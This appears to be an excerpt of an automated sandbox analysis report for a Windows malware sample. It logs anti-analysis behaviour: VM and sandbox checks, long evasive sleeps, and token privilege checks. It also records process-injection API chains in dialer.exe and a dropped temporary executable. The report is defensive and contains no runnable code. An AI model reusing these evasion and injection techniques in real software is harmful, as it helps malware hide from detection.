Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dialer.exe

Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,

4_2_00007FF78AB310C0

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4262	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5599	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5847	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3921	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 8389	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 1610	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 9926	Jump to behavior
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 9872	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6812
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2937
Source: C:\Windows\System32\dialer.exe	Window / User API: threadDelayed 1287
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6965
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2662

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp

Jump to dropped file

Found evasive API chain (may stop execution after accessing registry keys)

Source: C:\Windows\System32\dwm.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\winlogon.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Found evasive API chain checking for process token information

Source: C:\Windows\System32\dialer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\System32\winlogon.exe	API coverage: 7.8 %
Source: C:\Windows\System32\lsass.exe	API coverage: 8.5 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.4 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 7.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 7.7 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 7.5 %
Source: C:\Windows\System32\svchost.exe	API coverage: 5.7 %
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	API coverage: 1.4 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.5 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.2 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200	Thread sleep count: 4262 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200	Thread sleep count: 5599 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2484	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dialer.exe TID: 2180	Thread sleep count: 91 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2656	Thread sleep count: 5847 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2568	Thread sleep count: 3921 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6304	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6428	Thread sleep count: 8389 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6428	Thread sleep time: -8389000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6428	Thread sleep count: 1610 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6428	Thread sleep time: -1610000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 2504	Thread sleep count: 9926 > 30	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 2504	Thread sleep time: -9926000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7044	Thread sleep count: 274 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7044	Thread sleep time: -274000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 6228	Thread sleep count: 9872 > 30	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 6228	Thread sleep time: -9872000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6380	Thread sleep count: 251 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6380	Thread sleep time: -251000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6324	Thread sleep count: 253 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6324	Thread sleep time: -253000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4208	Thread sleep count: 253 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4208	Thread sleep time: -253000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3512	Thread sleep count: 248 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3512	Thread sleep time: -248000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3704	Thread sleep count: 199 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3704	Thread sleep time: -199000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4180	Thread sleep count: 253 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4180	Thread sleep time: -253000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7096	Thread sleep count: 232 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7096	Thread sleep time: -232000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5724	Thread sleep count: 250 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5724	Thread sleep time: -250000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4348	Thread sleep count: 6812 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072	Thread sleep count: 2937 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7124	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7156	Thread sleep count: 249 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7156	Thread sleep time: -249000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2996	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 2996	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5740	Thread sleep count: 242 > 30
Source: C:\Windows\System32\svchost.exe TID: 5740	Thread sleep time: -242000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6376	Thread sleep count: 232 > 30
Source: C:\Windows\System32\svchost.exe TID: 6376	Thread sleep time: -232000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3632	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 3632	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 4284	Thread sleep count: 1287 > 30
Source: C:\Windows\System32\dialer.exe TID: 4284	Thread sleep time: -128700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5264	Thread sleep count: 252 > 30
Source: C:\Windows\System32\svchost.exe TID: 5264	Thread sleep time: -252000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416	Thread sleep count: 6965 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416	Thread sleep count: 2662 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1456	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5180	Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 5180	Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7124	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 7124	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2568	Thread sleep count: 242 > 30
Source: C:\Windows\System32\svchost.exe TID: 2568	Thread sleep time: -242000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6740	Thread sleep count: 221 > 30
Source: C:\Windows\System32\svchost.exe TID: 6740	Thread sleep time: -221000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6404	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 6404	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5744	Thread sleep count: 50 > 30
Source: C:\Windows\System32\svchost.exe TID: 5744	Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3716	Thread sleep count: 248 > 30
Source: C:\Windows\System32\svchost.exe TID: 3716	Thread sleep time: -248000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2656	Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 2656	Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4192	Thread sleep count: 240 > 30
Source: C:\Windows\System32\svchost.exe TID: 4192	Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\spoolsv.exe TID: 3444	Thread sleep count: 251 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 3444	Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4856	Thread sleep count: 247 > 30
Source: C:\Windows\System32\svchost.exe TID: 4856	Thread sleep time: -247000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2192	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6200	Thread sleep count: 231 > 30
Source: C:\Windows\System32\svchost.exe TID: 6200	Thread sleep time: -231000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1856	Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 1856	Thread sleep time: -251000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe	Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64BE3C FindFirstFileExW,	7_2_00000225DC64BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6ABE3C FindFirstFileExW,	7_2_00000225DC6ABE3C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEBE3C FindFirstFileExW,	8_2_00000202C0AEBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130BE3C FindFirstFileExW,	9_2_000002A66130BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29BE3C FindFirstFileExW,	10_2_000002BAAE29BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CBE3C FindFirstFileExW,	11_2_0000026A879CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537ABE3C FindFirstFileExW,	12_2_00000179537ABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4BE3C FindFirstFileExW,	12_2_0000017953D4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56BE3C FindFirstFileExW,	13_2_000002295D56BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6BE3C FindFirstFileExW,	14_2_0000025306E6BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BBE3C FindFirstFileExW,	15_2_000001845B3BBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4BE3C FindFirstFileExW,	16_2_000001ADECD4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907BE3C FindFirstFileExW,	17_2_000001D55907BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EABE3C FindFirstFileExW,	18_2_00000241A9EABE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EBE3C FindFirstFileExW,	21_2_000002152C3EBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319BE3C FindFirstFileExW,	24_2_000001CD7319BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89BE3C FindFirstFileExW,	26_2_000002824E89BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FBE3C FindFirstFileExW,	26_2_000002824E8FBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3BE3C FindFirstFileExW,	27_2_0000021B47B3BE3C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: svchost.exe, 0000000F.00000002.3019665263.000001845BC0A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000031.00000000.1949907163.0000023D1002B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000011.00000000.1818929292.000001D559386000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: dwm.exe, 0000000A.00000000.1759493693.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
Source: svchost.exe, 00000011.00000003.1837092807.000001D5593A4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: svchost.exe, 00000011.00000000.1818112818.000001D559274000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: storahciNECVMWarVMware SATA CD00
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
